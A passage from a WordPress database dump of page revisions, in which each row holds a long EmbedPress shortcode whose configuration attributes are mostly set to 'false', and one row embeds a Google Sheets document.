_transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\'][/embedpress]','Elementor #1571','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:49:38','2025-07-01 07:49:38','',1571,'http://pakhaeng.ssk.in.th/?p=1585',0,'revision','',0),
(1586,1,'2025-07-01 14:49:38','2025-07-01 07:49:38','[embedpress prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' height=\'800\' align=\'center\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_embeded_link=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' width=\'1200\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\'][/embedpress]','Elementor #1571','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:49:38','2025-07-01 07:49:38','',1571,'http://pakhaeng.ssk.in.th/?p=1586',0,'revision','',0),
(1587,1,'2025-07-01 14:49:39','2025-07-01 07:49:39','[embedpress embedpress_embeded_link=\'https://docs.google.com/spreadsheets/d/17ngXMYbWSYd2IQIXTR7A80Xfbp7sbY0g/edit?gid=101226550#gid=101226550\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'800\' align=\'center\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' 